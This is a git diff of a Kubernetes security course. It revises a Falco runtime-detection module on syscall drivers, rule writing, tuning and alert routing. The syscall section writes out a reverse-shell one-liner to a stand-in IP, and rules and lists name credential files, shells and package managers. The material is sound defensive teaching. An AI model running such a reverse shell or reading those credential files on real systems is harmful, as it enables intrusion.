+- [Gatekeeper Audit](https://open-policy-agent.github.io/gatekeeper/website/docs/audit/) - Primary documentation for periodic audit of existing resources and violation reporting.
+- [Gatekeeper Mutation](https://open-policy-agent.github.io/gatekeeper/website/docs/mutation/) - Primary documentation for Gatekeeper mutation resources such as `Assign` and `ModifySet`.
+- [Gatekeeper External Data](https://open-policy-agent.github.io/gatekeeper/website/docs/externaldata/) - Primary documentation for external data provider patterns and security considerations.
+- [Gatekeeper Library](https://open-policy-agent.github.io/gatekeeper-library/website/) - Primary site for the community-owned Gatekeeper policy library.
+- [CNCF Open Policy Agent Project](https://www.cncf.io/projects/open-policy-agent-opa/) - CNCF project page used to verify OPA maturity and project status.
+- [CNCF Kyverno Project](https://www.cncf.io/projects/kyverno/) - CNCF project page used to verify Kyverno maturity and project status.
+- [CNCF Kyverno Graduation Announcement](https://www.cncf.io/announcements/2026/03/24/cloud-native-computing-foundation-announces-kyvernos-graduation/) - CNCF announcement used to verify the public Kyverno graduation announcement date.
+- [Kyverno Introduction](https://kyverno.io/docs/introduction/) - Primary Kyverno documentation for policy-as-code capabilities and authoring model.
+- [Kyverno ValidatingPolicy](https://kyverno.io/docs/policy-types/validating-policy/) - Primary Kyverno documentation for its CEL-based validating policy type and comparison with native VAP.
+- [Conftest](https://www.conftest.dev/) - Primary Conftest documentation for testing structured configuration data with policy.
+- [Fairwinds Polaris Documentation](https://polaris.docs.fairwinds.com/) - Primary Polaris documentation for workload validation, remediation, admission controller, dashboard, and CLI modes.
 
 ## Next Module
 
 Continue to [Module 4.3: Falco](../module-4.3-falco/) to learn runtime security monitoring for detecting threats in running containers.
-
----
-
-*"Security is not a feature you add—it's a constraint you enforce. Gatekeeper makes that constraint automatic."*
-
-## Sources
-
-- [cncf.io: open policy agent opa](https://www.cncf.io/projects/open-policy-agent-opa/) — The CNCF project page gives the acceptance date for OPA directly.
-- [raw.githubusercontent.com: README.md](https://raw.githubusercontent.com/open-policy-agent/opa/main/README.md) — The upstream README states that OPA is a general-purpose policy engine and explains its query-based evaluation model.
-- [Kubernetes Admission Controllers](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/) — Explains where admission control fits in the API request path and why it matters for policy enforcement.
-- [Gatekeeper Repository](https://github.com/open-policy-agent/gatekeeper) — Provides the upstream overview of Gatekeeper features such as constraints, mutation support, audit, and policy library integration.
-- [OPA Repository](https://github.com/open-policy-agent/opa) — Provides the upstream overview of OPA as a general-purpose policy engine and links to its core integrations and language resources.

--- a/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.3-falco.md
+++ b/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.3-falco.md
@@ -1,84 +1,59 @@
 ---
-revision_pending: true
+revision_pending: false
 title: "Module 4.3: Falco & Runtime Security"
 slug: platform/toolkits/security-quality/security-tools/module-4.3-falco
 sidebar:
   order: 4
 ---
-> **Toolkit Track** | Complexity: `[COMPLEX]` | Time: 45-50 minutes
-
-## Overview
-
-Admission control stops bad configurations, but what about runtime attacks? A container might be deployed safely then get compromised. This module covers Falco, the cloud-native runtime security tool that detects threats in running containers by monitoring system calls.
-
-**What You'll Learn**:
-- Falco architecture and syscall monitoring
-- Writing and tuning Falco rules
-- Alert routing and response
-- Integration with incident response
-
-**Prerequisites**:
-- [Security Principles Foundations](/platform/foundations/security-principles/)
-- Linux basics (processes, files, networking)
-- Kubernetes networking concepts
-
----
+> **Toolkit Track** | Complexity: `[COMPLEX]` | Time: 50-60 minutes
+>
+> **Prerequisites**: [Security Principles Foundations](/platform/foundations/security-principles/), Linux basics (processes, files, networking), Kubernetes networking concepts
 
 ## What You'll Be Able to Do
 
 After completing this module, you will be able to:
 
-- **Deploy Falco with eBPF driver for runtime security monitoring of Kubernetes workloads**
-- **Configure custom Falco rules to detect suspicious container behavior (shell access, file modifications, network connections)**
-- **Implement Falco alert routing to Slack, PagerDuty, and SIEM systems for security incident response**
-- **Integrate Falco with Kubernetes admission controllers for runtime-informed deployment decisions**
-
+- **Deploy Falco with the modern eBPF driver for runtime security monitoring of Kubernetes workloads**
+- **Configure custom Falco rules to detect suspicious container behavior, including shell access, file modifications, and unexpected network connections**
+- **Implement Falco alert routing through Falcosidekick to Slack, PagerDuty, Prometheus, and SIEM systems for security incident response**
+- **Tune Falco rules to reduce false positives while maintaining detection coverage, using exceptions, macros, and pod labels**
+- **Understand the distinction between runtime detection (Falco) and in-kernel enforcement (Tetragon, KubeArmor) to choose the right tool for each security layer**
 
 ## Why This Module Matters
 
-Prevention eventually fails. When it does, you need detection. Falco watches what containers actually DO—not what they claim they'll do. Cryptominer spawning a process? Detected. Shell opened in a webserver container? Detected. Sensitive file read by unauthorized process? Detected.
+Every cloud-native security pipeline eventually reaches the same uncomfortable conclusion: prevention is necessary but insufficient. You can scan every image for known vulnerabilities with Trivy. You can enforce policies at the admission gate with Kyverno or Gatekeeper. You can sign every container image with Cosign and verify those signatures before deployment. And still, a container running in your production cluster can be compromised by an attack that none of those controls could have stopped.
 
-> 💡 **Did You Know?** Falco was created by Sysdig and donated to CNCF in 2018. It uses eBPF (extended Berkeley Packet Filter) to hook into the Linux kernel and monitor every system call with near-zero overhead. It's like having a security camera for every container's soul.
+Consider what happens when a zero-day vulnerability in a widely-used library is disclosed on a Tuesday morning. Your image scanners do not know about it yet because the CVE has not been published. Your admission policies approved the deployment last Friday because the image passed every check. The container is already running, serving traffic, and the only thing standing between you and a breach is the actual behavior of the processes inside that container. This is the gap that runtime security exists to close.
 
----
+Runtime detection does not ask "does this container image contain known vulnerabilities?" It asks "is this container doing something it should not be doing right now?" The distinction is fundamental. Build-time and deploy-time security validate intent — what the image claims it will do, what the manifest declares, what the policy permits. Runtime security observes reality — what the processes actually execute, what files they actually open, what network connections they actually establish. When intention and reality diverge, that divergence is a security signal.
 
-## Runtime Security Landscape
+> **Hypothetical scenario:** A platform team deploys a web application behind standard controls: image scanning, admission webhooks, network policies, and read-only root filesystems. Three months later, CPU utilization on the web pods begins climbing gradually — not a spike, just a slow and steady increase from 15% to roughly 40% over two weeks. The monitoring dashboard attributes it to organic traffic growth. What is actually happening: an attacker exploited a deserialization vulnerability in a logging library six weeks after the container was deployed, gained a foothold, and is now running a cryptocurrency miner under a process named `httpd-gc` that blends into the normal process tree. No image scanner would have flagged this because the vulnerability was unknown at build time. No admission controller would have blocked it because the pod was admitted months ago. Only runtime behavioral monitoring — watching for unexpected process execution, unusual outbound connections, or anomalies against a known profile — could have surfaced the intrusion before it ran for weeks undetected.
 
-```
-SECURITY LAYERS
-════════════════════════════════════════════════════════════════════
+## How Runtime Detection Captures Events
 
-┌─────────────────────────────────────────────────────────────────┐
-│                    WHEN DOES IT CHECK?                           │
-├─────────────────────────────────────────────────────────────────┤
-│                                                                  │
-│  BUILD TIME                                                      │
-│  ┌───────────────────────────────────────┐                      │
-│  │ Image Scanning (Trivy, Snyk)          │                      │
-│  │ SAST, secrets detection               │                      │
-│  └───────────────────────────────────────┘                      │
-│                     │                                            │
-│                     ▼                                            │
-│  DEPLOY TIME                                                     │
-│  ┌───────────────────────────────────────┐                      │
-│  │ Admission Control (Gatekeeper, Kyverno)│                     │
-│  │ Image signature verification          │                      │
-│  └───────────────────────────────────────┘                      │
-│                     │                                            │
-│                     ▼                                            │
-│  RUNTIME ◀── YOU ARE HERE                                       │
-│  ┌───────────────────────────────────────┐                      │
-│  │ Syscall Monitoring (Falco)            │                      │
-│  │ Network policies enforcement          │                      │
-│  │ File integrity monitoring             │                      │
-│  └───────────────────────────────────────┘                      │
-│                                                                  │
-└─────────────────────────────────────────────────────────────────┘
-```
+Runtime detection systems operate by observing events at the boundary between userspace and the kernel. Every meaningful action a container performs — spawning a process, opening a file, establishing a network connection, mounting a filesystem — must transit through a system call. The kernel sees everything, and if you can instrument the kernel to report on those system calls, you can build a complete picture of container behavior at runtime.
 
----
+### System Calls as the Foundation
+
+A system call is the mechanism by which a userspace program requests a service from the operating system kernel. When a containerized process runs `cat /etc/shadow`, it does not directly read bytes from a disk. It calls the `openat()` system call to obtain a file descriptor, then calls `read()` to pull data through that descriptor. When an attacker spawns a reverse shell with `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1`, the kernel sees an `execve()` call launching bash, followed by `socket()` and `connect()` system calls establishing an outbound TCP connection. These are observable events, and they form the raw material from which runtime detection rules are built.
+
+The power of syscall-based monitoring is that it is semantically rich and impossible for a userspace process to evade. A process can rename itself, hide from `/proc`, or masquerade as a legitimate binary, but it cannot avoid making system calls to do useful work. The kernel is the ultimate source of truth about what is happening on a system, and instrumenting the kernel at the syscall layer provides an unspoofable audit trail of every significant action.
+
+However, the raw syscall stream is also extraordinarily noisy. A single `kubectl exec` into a container to run `ls` can generate dozens of system calls. A busy production workload might generate hundreds of thousands per second. Worse, the vast majority of these syscalls are entirely benign — reading configuration files, writing log lines, accepting incoming HTTP connections on the expected port. The challenge of runtime detection is not capturing the data — it is filtering the signal from the noise, and doing so with minimal performance overhead. If the instrumentation is too heavy, it becomes the bottleneck that the security team is blamed for. If it is too light, it misses the attacker's subtle movements. This filtering problem is what makes Falco's rules engine, with its composable macros, lists, and priority levels, the critical middle layer of the architecture rather than an afterthought bolted onto a syscall dump.
+
+### The Instrumentation Layer: Drivers
+
+Falco captures system calls through a kernel instrumentation layer called a driver. The driver sits between the kernel's syscall dispatch path and the Falco userspace engine, capturing relevant events and passing them up for evaluation against rules. There are two driver architectures available, and the choice between them has meaningful tradeoffs for deployability, safety, and performance.
+
+**Kernel Module.** The original Falco driver, implemented as a traditional Linux kernel module (`*.ko`). It compiles against the specific kernel headers of the target host and inserts itself into the kernel's syscall handling path. The kernel module is the most mature driver and works on kernels as old as 3.10 on x86_64, which makes it the only option for very old or highly-customized Linux distributions. The tradeoff is operational complexity: the module must be compiled for each kernel version, requires full kernel headers to be available on the host, and runs with full kernel privileges. On managed Kubernetes services that restrict kernel module loading — such as GKE Autopilot or EKS Fargate — the kernel module is simply not an option. The module also represents a larger attack surface: a bug in the driver can crash the entire node, not just the Falco process.
+
+**Modern eBPF Probe.** The recommended driver for contemporary deployments, introduced as a first-class option in Falco 0.35 and built on the CO-RE (Compile Once, Run Everywhere) paradigm. The modern eBPF probe compiles its instrumentation logic once at build time into a portable eBPF object that can be loaded on any kernel supporting the required eBPF features — principally the BPF ring buffer and BTF (BPF Type Format) type information. These features are available by default in kernel 5.8 and later, though many distributions have backported them to older kernels. The transformative advantage of CO-RE is that the probe does not need kernel headers, does not compile anything at load time, and is embedded directly into the Falco userspace binary. When you deploy Falco with `driver.kind=modern_ebpf`, the probe loads automatically if the kernel supports it, with no external dependencies. The modern eBPF probe also runs with a minimal set of Linux capabilities — `CAP_SYS_ADMIN`, `CAP_BPF`, `CAP_PERFMON`, and `CAP_NET_RAW` — rather than requiring full root equivalence. This substantially reduces the blast radius of a potential vulnerability in the driver itself.
+
+There is also a legacy eBPF probe (sometimes called the "classic" eBPF driver) that predates CO-RE and requires kernel headers for compilation. It is still supported but is being superseded by the modern eBPF probe and should only be used when the kernel module is unavailable and the modern probe's kernel requirements are not met. For most greenfield deployments on Kubernetes, the modern eBPF probe is the correct starting point.
 
 ## Falco Architecture
+
+Falco's architecture follows a clean pipeline: events flow from the kernel through a driver into a userspace engine that evaluates them against a rule set, and matching events are emitted through configurable output channels. Understanding this pipeline is essential for operating Falco effectively, because each stage has its own failure modes, performance characteristics, and tuning knobs.
 
 ```
 FALCO ARCHITECTURE
@@ -115,39 +90,45 @@ FALCO ARCHITECTURE
 └─────────────────────────────────────────────────────────────────┘
 ```
 
-### Driver Options
+The driver is the first stage. On each node in your cluster, a Falco pod (typically deployed as a DaemonSet) attaches the driver to the kernel and begins receiving a filtered stream of system call events. The filtering happens in the kernel before events reach userspace, which is critical for performance — Falco instructs the eBPF probe to only capture events relevant to the rules that are loaded, rather than streaming every syscall on the system into userspace for evaluation.
 
-| Driver | Pros | Cons |
-|--------|------|------|
-| **eBPF** | No kernel module, safer, modern | Needs kernel 4.14+ |
-| **Kernel Module** | Works on older kernels | Requires kernel headers, more risk |
-| **Modern eBPF (CO-RE)** | Portable across kernel versions | Needs kernel 5.8+ |
+The engine is the second stage. Event records arrive from the driver and are evaluated against the loaded rule set. Falco's rule engine is built on top of libsinsp, the same system inspection library that powers Sysdig, and it enriches raw syscall events with context: the container ID, the Kubernetes pod name and namespace, the process ancestry tree, and the user identity. This enrichment is what transforms a raw event like "PID 14235 called execve()" into an actionable alert like "Shell spawned in container nginx, pod nginx-5d4c7b8f-abc12, namespace production, by user root."
 
-### Installation
+The outputs stage is the third and final stage. When a rule evaluates to true, the engine constructs an alert message from the rule's output template and passes it to the configured output channels. The simplest configuration writes alerts to stdout (which becomes a Kubernetes log line), but Falco also supports direct output to syslog, file, program pipes, and HTTP webhooks. In practice, most production deployments route through Falcosidekick, a companion daemon that multiplexes alerts to dozens of downstream systems.
+
+### Installation Patterns
+
+Falco is most commonly deployed on Kubernetes as a DaemonSet using the official Helm chart. The DaemonSet ensures one Falco pod per node, which gives each Falco instance a direct view of the kernel events on its host. The Helm chart handles driver selection, rule file mounting, and Falcosidekick integration through a single values file.
 
 ```bash
 # Add Falco Helm repo
 helm repo add falcosecurity https://falcosecurity.github.io/charts
 helm repo update
 
-# Install with eBPF driver (recommended)
+# Install with modern eBPF driver (recommended)
 helm install falco falcosecurity/falco \
   --namespace falco \
   --create-namespace \
   --set falcosidekick.enabled=true \
   --set falcosidekick.webui.enabled=true \
-  --set driver.kind=ebpf
+  --set driver.kind=modern_ebpf
 
 # Verify
 kubectl get pods -n falco
 kubectl logs -n falco -l app.kubernetes.io/name=falco
 ```
 
----
+Falco can also run as a standalone binary on Linux hosts (installed via DEB or RPM packages), as a Docker container with the host's kernel instrumented from the outside, or managed through the Falco Operator which provides a Kubernetes-native custom resource for declarative configuration. The Helm chart remains the most common path for Kubernetes-native deployments because it handles the full lifecycle — DaemonSet, RBAC, ConfigMaps for rules, and sidecar integration — in a single install command. When configuring the chart, the two decisions that most affect your operational experience are the driver selection (`driver.kind`) and the Falcosidekick enablement. Choosing `modern_ebpf` eliminates the ongoing maintenance burden of kernel header management; enabling Falcosidekick is what transforms Falco from a log-producing DaemonSet into an actionable security detection pipeline.
 
-## Falco Rules
+## The Falco Rules Engine
 
-### Rule Structure
+Falco rules are the bridge between raw kernel events and actionable security alerts. A rule is a YAML document that declares: "when you observe these conditions in the event stream, emit this output at this priority." The power of the rules engine comes from its composability — rules are built from reusable macros and lists, which encourages a layered approach to detection logic where common filtering conditions are defined once and shared across many rules.
+
+### Rule Anatomy
+
+Every Falco rule contains a required set of fields: `rule` (the name), `desc` (a human-readable description), `condition` (a boolean expression evaluated against each event), `output` (a template string rendered when the rule fires), and `priority` (one of EMERGENCY, ALERT, CRITICAL, ERROR, WARNING, NOTICE, INFORMATIONAL, or DEBUG). Optional fields include `enabled` (to disable a rule without deleting it), `tags` (for categorization, conventionally including MITRE ATT&CK technique IDs), and `exceptions` (structured conditions that suppress the rule in known-benign circumstances).
+
+The condition field uses a domain-specific filtering language that references event fields, macros, and lists. Event fields are drawn from the syscall event itself — `evt.type` for the system call name, `proc.name` for the process executable, `fd.name` for file descriptor paths, `fd.sip` and `fd.sport` for network connection endpoints — as well as from the enrichment layer that Falco applies: `container.id`, `container.image.repository`, `k8s.ns.name`, `k8s.pod.name`, `user.name`, and dozens of others.
 
 ```yaml
 # A Falco rule has these components:
@@ -167,7 +148,11 @@ kubectl logs -n falco -l app.kubernetes.io/name=falco
   tags: [container, shell, mitre_execution]
 ```
 
-### Condition Components
+### Macros and Lists: Composable Detection Logic
+
+Writing every rule with fully inline conditions would be repetitive and error-prone. Macros encapsulate commonly-used condition fragments into named, reusable components. A macro like `spawned_process` expands to `evt.type = execve and evt.dir = <`, capturing the core event that signals a new process. Another macro like `container` expands to `container.id != host`, ensuring the rule only fires for processes inside containers rather than on the host node itself. By composing macros, a rule author can express complex detection logic as a readable chain of named predicates.
+
+Lists serve a complementary role: they define collections of values that are referenced in conditions. A list of shell binaries (`bash, sh, zsh, ksh`) can be checked with `proc.name in (shell_binaries)`. A list of sensitive file paths (`/etc/shadow, /etc/passwd, /etc/sudoers`) can be checked with `fd.name in (sensitive_files)`. Lists make rules self-documenting — the intent of the list is clear from its name — and they centralize value management so that adding a new shell binary to the list updates every rule that references it.
 
 ```yaml
 # Macros - reusable condition fragments
@@ -184,11 +169,27 @@ kubectl logs -n falco -l app.kubernetes.io/name=falco
 - list: sensitive_files
   items: [/etc/shadow, /etc/passwd, /etc/sudoers]
 
-- list: allowed_shells
-  items: [bash, sh]
+- list: package_mgmt_binaries
+  items: [apt, apt-get, yum, dnf, apk, pip, npm]
 ```
 
-### Common Detection Rules
+### Priority Levels and Alert Triage
+
+Falco assigns every alert a priority from the standard syslog severity scale, and using these priorities correctly is the first line of defense against alert fatigue. CRITICAL should be reserved for events that indicate a probable active compromise: reverse shells, cryptominer execution, container escape attempts, or writes to sensitive system paths by unexpected processes. WARNING is appropriate for behavior that is suspicious but not definitively malicious: a shell spawning in a production container, a package manager being invoked, or an outbound connection to an unrecognized destination. NOTICE and INFORMATIONAL are useful during the tuning phase to understand baseline behavior, but in production these lower-priority alerts should typically be routed to a log aggregation system rather than to an on-call pager.
+
+The priority level also controls routing behavior in Falcosidekick. A common configuration sends CRITICAL alerts to PagerDuty for immediate response, WARNING alerts to Slack for triage during business hours, and everything else to Loki or Elasticsearch for forensic analysis. This tiered routing ensures that the security team's attention is directed at the highest-signal events while still preserving a complete audit trail for incident investigation.
+
+### Core Detection Rules
+
+Falco ships with a default rule set maintained by the community that covers the most common cloud-native attack patterns. These rules embody years of operational security experience and provide a strong starting point for any deployment. Understanding what each rule detects and why it matters is essential before you begin tuning or writing custom rules.
+
+**Shell in Container.** The most fundamental runtime detection rule. Spawning an interactive shell inside a running production container is rarely legitimate — it typically means a human operator is debugging (acceptable if governed by policy) or an attacker has gained code execution and is exploring the environment (an active incident). The default rule fires on any `execve` of a shell binary inside a container context. This rule alone accounts for the majority of false positives in most deployments because `kubectl exec` for legitimate debugging is both common and indistinguishable at the syscall level from an attacker's reconnaissance shell. Tuning this rule well — using pod labels, namespace exceptions, and time-based windows — is the single most impactful operational decision you will make when deploying Falco.
+
+**Unexpected Outbound Connection.** Containers generally have a narrow and predictable set of network destinations: their database, their cache, their upstream API, and perhaps an observability backend. A connection to an arbitrary IP address on a non-standard port is a strong indicator of command-and-control traffic, data exfiltration, or cryptomining pool communication. The default rule fires on outbound connections from containers where the destination is not in a defined allowlist. Maintaining this allowlist accurately — keeping it tight enough to detect anomalies but loose enough to avoid drowning in false positives — is a continuous operational discipline that requires coordination between the security team and the service owners who understand each workload's legitimate network dependencies.
+
+**Write to Sensitive Mount.** Containers should not write to `/etc`, `/bin`, `/usr`, or other system directories — their filesystems should be immutable except for specific data volumes. A write to `/etc/passwd`, `/etc/shadow`, or `/etc/crontab` inside a container is a near-certain indicator of attacker persistence activity.
+
+**Privilege Escalation Attempt.** Any attempt by a containerized process to change its user ID to root via `setuid()`, to manipulate Linux capabilities, or to mount the host filesystem from within a container is an immediate red flag. The default rule set includes multiple privilege escalation signatures keyed to the MITRE ATT&CK Privilege Escalation tactic.
 
 ```yaml
 # 1. Cryptominer Detection
@@ -260,29 +261,34 @@ kubectl logs -n falco -l app.kubernetes.io/name=falco
   tags: [container, escape, mitre_privilege_escalation]
 ```
 
-> 💡 **Did You Know?** Falco rules use MITRE ATT&CK tags to map detections to the attacker's tactics. This helps SOC teams understand not just what happened, but why an attacker might do it. The MITRE framework categorizes attacks into techniques like Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, and Impact.
+## Rule Tuning: The Real Operational Work
 
----
+Deploying Falco with the default rules on a production cluster will, within minutes, generate alerts. This is not a sign that Falco is broken or that your cluster is compromised — it is a sign that real-world workloads are complex and the default rules are deliberately broad. The operational work of running Falco is rule tuning: reducing false positives to a manageable level without creating blind spots that an attacker could exploit.
 
-## Rule Tuning
+### The Tuning Lifecycle
 
-### The False Positive Problem
+The tuning process follows a predictable lifecycle. You deploy the default rules in a staging or non-critical environment. You observe which rules fire most frequently and which ones map to known-legitimate behavior. For each noisy rule, you determine whether the underlying behavior is expected — an init container that installs packages, a debug sidecar that spawns shells, a backup agent that reads sensitive files — and you encode that expectation into the rule as an exception. You redeploy and observe again, iterating until the alert volume in a normal operational day is low enough that a human can investigate every WARNING and CRITICAL alert. At that point, the rule set is ready for production.
+
+Tuning is not a one-time activity. Every new workload, every new version of a third-party container image, and every change to operational procedures can introduce new legitimate behaviors that trip existing rules. Teams that treat Falco tuning as a set-and-forget task invariably drift into one of two failure modes: either they disable so many rules that the deployment becomes a placebo, or they tolerate alert fatigue so severe that real incidents are drowned in noise.
 
 ```
 RULE LIFECYCLE
 ════════════════════════════════════════════════════════════════════
 
-Initial Deploy ──▶ Alert Storm ──▶ Tune Rules ──▶ Stable Detection
-                    (too noisy)     (exceptions)    (useful alerts)
-
-Common tuning needs:
-• Legitimate shell access (kubectl exec for debugging)
-• Backup tools reading sensitive files
-• Init containers running package managers
-• Sidecar containers with special permissions
+Initial Deploy ──▶ Observe Noise ──▶ Add Exceptions ──▶ Validate Coverage ──▶ Production
+                                              ▲                           │
+                                              └─────── Iterate ──────────┘
 ```
 
-### Adding Exceptions
+### Exception Strategies
+
+Falco provides multiple mechanisms for adding exceptions to rules, and choosing the right mechanism for each false positive is important for maintainability. The three most common approaches are macro exceptions, list exceptions, and pod-label gating.
+
+Macro exceptions are the most flexible approach. You define a macro that captures the condition under which a specific behavior is expected — for example, "shell processes spawned from containers running the debug-tools image" or "package managers invoked within pods labeled `builder=true`." You then add `and not <macro-name>` to the rule's condition. The advantage of macro exceptions is that they are self-documenting: the macro name explains why the exception exists. The disadvantage is that they add complexity to the rule's condition, and a single poorly-specified macro can suppress the rule for a much broader set of events than intended.
+
+List exceptions are appropriate when the exception is a closed set of known-safe values. If a small number of container images legitimately run shell processes, you can maintain a list of those images and check `not container.image.repository in (allowed_shell_images)`. Lists are easy to audit because all the values are in one place, but they require manual updates whenever a new allowlisted workload is added.
+
+Pod-label gating is the most operationally elegant approach for Kubernetes deployments. Instead of maintaining allowlists in Falco's configuration, you encode the security posture of each workload in its Kubernetes labels. A pod that is authorized to spawn shells carries the label `shell-allowed: "true"`. The Falco rule checks `not k8s.pod.label.shell-allowed = "true"`. This approach decouples Falco configuration from workload management — the platform team controlling the pod spec decides which workloads are authorized for special access, and Falco automatically respects those decisions.
 
 ```yaml
 # Method 1: Macro exceptions
@@ -296,14 +302,14 @@ Common tuning needs:
     spawned_process and
     container and
     shell_procs and
-    not trusted_shell_process  # Added exception
+    not trusted_shell_process
   # ... rest of rule
 
 # Method 2: List exceptions
 - list: allowed_package_manager_images
   items: [
     gcr.io/my-project/builder,
-    docker.io/library/python  # pip during build
+    docker.io/library/python
   ]
 
 - rule: Package Manager Execution in Container
@@ -312,9 +318,25 @@ Common tuning needs:
     container and
     proc.name in (apt, apt-get, yum, dnf, apk, pip) and
     not container.image.repository in (allowed_package_manager_images)
+
+# Method 3: Pod-label gating
+- rule: Unexpected Shell in Container
+  desc: Shell in production container (excluding labeled pods)
+  condition: >
+    spawned_process and
+    container and
+    shell_procs and
+    not k8s.ns.name = "debug" and
+    not k8s.pod.label.shell-allowed = "true"
+  output: >
+    Shell spawned (user=%user.name container=%container.name
+    namespace=%k8s.ns.name pod=%k8s.pod.name)
+  priority: WARNING
 ```
 
-### Custom Rules File
+### Custom Rules Files on Kubernetes
+
+When deploying Falco via Helm, custom rules are supplied as a values file that inlines YAML rule definitions. This approach keeps your detection logic in version control alongside your infrastructure configuration, which makes it auditable and reproducible. The custom rules file can both add new rules and override or disable existing default rules.
 
 ```yaml
 # custom-rules.yaml
@@ -322,7 +344,7 @@ customRules:
   my-rules.yaml: |-
     # Override default rule
     - rule: Terminal Shell in Container
-      enabled: false  # Disable noisy default rule
+      enabled: false
 
     # Add our tuned version
     - rule: Unexpected Shell in Container
@@ -346,9 +368,13 @@ helm upgrade falco falcosecurity/falco \
   -f custom-rules.yaml
 ```
 
----
-
 ## Alert Routing with Falcosidekick
+
+Falco itself emits alerts to stdout by default. While this is sufficient for development and ad-hoc testing — `kubectl logs` on the Falco pod shows you what is happening — a production deployment needs alerts to reach the right people through the right channels at the right urgency. Falcosidekick is the routing layer that sits between Falco's output and the broader observability and incident response ecosystem.
+
+### Architecture and Multichannel Routing
+
+Falcosidekick runs as a separate process (typically a sidecar container in the Falco DaemonSet pod or a standalone deployment) that receives alerts from Falco over HTTP or gRPC. On receiving an alert, it evaluates the alert's priority and, based on its configuration, forwards the alert to one or more downstream outputs. A single alert can be routed to multiple outputs simultaneously — a CRITICAL cryptominer detection might go to PagerDuty for immediate paging, to Slack for team visibility, to Prometheus as a metric for dashboarding, and to an S3 bucket for long-term retention, all from one event.
 
 ```
 FALCOSIDEKICK ARCHITECTURE
@@ -358,17 +384,18 @@ FALCOSIDEKICK ARCHITECTURE
 │                                                                  │
 │  Falco ──▶ Falcosidekick ──┬──▶ Slack                          │
 │            (router)        ├──▶ PagerDuty                       │
-│                           ├──▶ Prometheus                       │
+│                           ├──▶ Prometheus Alertmanager          │
 │                           ├──▶ Elasticsearch                    │
 │                           ├──▶ Loki                             │
-│                           ├──▶ AWS Lambda                       │
-│                           ├──▶ Webhook (custom)                 │
-│                           └──▶ Kubernetes Response              │
+│                           ├──▶ AWS Lambda / S3                  │
+│                           ├──▶ Kafka / NATS                     │
+│                           ├──▶ Webhook (custom endpoint)        │
+│                           └──▶ Falco Talon (response actions)   │
 │                                                                  │
 └─────────────────────────────────────────────────────────────────┘
 ```
 
-### Configuration
+The configuration model is straightforward: each output has its own configuration block within the Falcosidekick config, and each block can specify a `minimumpriority` threshold. Alerts below the threshold are silently dropped for that output, which allows you to route CRITICAL and EMERGENCY events to PagerDuty while sending WARNING and above to Slack, without duplicating the alerting logic.
 
 ```yaml
 # Falcosidekick config
@@ -387,236 +414,200 @@ falcosidekick:
     prometheus:
       enabled: true
 
-    # Automatic response via Kubernetes
-    kubernetestailor:
-      enabled: true
-      # Delete pod on critical alert
-      annotations:
-        annotation.falco.enabled: "true"
-        annotation.falco.deletepod: "true"
+    loki:
+      hostport: "http://loki.monitoring:3100"
+      minimumpriority: "debug"
 ```
 
-### Response Actions
+### Kubernetes-Native Response with Falco Talon
 
-```yaml
-# Automatic pod deletion on critical alerts
-apiVersion: v1
-kind: Pod
-metadata:
-  name: protected-app
-  annotations:
-    falco.enabled: "true"
-    falco.deletepod: "true"  # Delete if Falco detects critical event
-spec:
-  containers:
-  - name: app
-    image: myapp:latest
-```
+Detection is only half of the security equation. Once Falco identifies a suspicious event, what happens next? For many teams, the initial response is manual: an on-call engineer receives the PagerDuty alert, investigates the context, and decides whether to isolate the pod, capture a memory dump, or escalate. But manual response has latency measured in minutes, and in an active compromise, minutes matter.
 
-> 💡 **Did You Know?** Falcosidekick can trigger AWS Lambda functions on alerts. Teams use this for automated response—quarantining pods, capturing forensic data, or creating tickets. One team built a Lambda that automatically captures memory dumps of suspicious containers before terminating them.
+Falco Talon is the response-action companion to Falco. It subscribes to Falco alerts (typically through Falcosidekick) and executes pre-configured response actions based on the alert's rule, priority, and Kubernetes context. Common response actions include: immediately deleting the pod (triggering a restart from a known-good image), cordoning the node, capturing a forensic snapshot (process list, network connections, filesystem diff), or applying a network policy that isolates the pod from all traffic. Talon actions are configured as YAML rules that map Falco rule names to response actions with configurable parameters.
 
----
+The decision to automate response actions is a tradeoff between response speed and blast radius. Automatically deleting a pod on a CRITICAL alert stops an active attack within seconds, but if the alert is a false positive — a legitimate but unusual operation that happened to match a detection rule — you have just disrupted a production service unnecessarily. Teams typically start with alert-only mode, build confidence in their rule tuning over weeks or months, and then gradually introduce automated response for the highest-confidence, lowest-false-positive rules. A pragmatic intermediate step is to configure Talon to execute non-destructive actions — capturing forensic snapshots, applying network isolation policies, or creating an incident ticket — while still requiring human approval for destructive actions like pod deletion. This preserves the speed advantage of automation for evidence collection while keeping the blast-radius safety net of human judgment for service-affecting decisions.
 
-## Kubernetes Integration
+## Patterns and Anti-Patterns
 
-### Pod Labels and Annotations in Rules
+### Patterns
 
-```yaml
-- rule: Shell in Production Pod Without Debug Label
-  condition: >
-    spawned_process and
-    container and
-    shell_procs and
-    k8s.ns.name = "production" and
-    not k8s.pod.label.allow-shell = "true"
-  output: >
-    Unauthorized shell in production
-    (pod=%k8s.pod.name namespace=%k8s.ns.name user=%user.name)
-  priority: CRITICAL
-```
+**Layered exception strategy.** Use pod labels as the primary gating mechanism for Kubernetes-aware rules, lists for closed sets of known-safe values (like internal tool images), and macros for complex conditional exceptions that combine multiple fields. This hierarchy keeps the most operationally dynamic decisions — which pods are authorized for special access — in the pod spec rather than in the Falco configuration, where platform teams already manage them.
 
-### Available Kubernetes Fields
+**Tune in staging, monitor in production.** Run the full default rule set in a staging cluster that mirrors production workload patterns. Spend at least a week observing alerts, adding exceptions for every legitimate behavior, and confirming that no real attacks would have been missed. Only then promote the tuned rule set to production. This staging soak period is the single highest-return investment you can make in Falco effectiveness.
 
-| Field | Description | Example |
-|-------|-------------|---------|
-| `k8s.pod.name` | Pod name | `nginx-5d4c7b8f-abc12` |
-| `k8s.ns.name` | Namespace | `production` |
-| `k8s.deployment.name` | Deployment name | `nginx` |
-| `k8s.pod.label.<key>` | Pod label value | `k8s.pod.label.app` |
-| `container.image.repository` | Image without tag | `nginx` |
-| `container.image.tag` | Image tag | `1.21` |
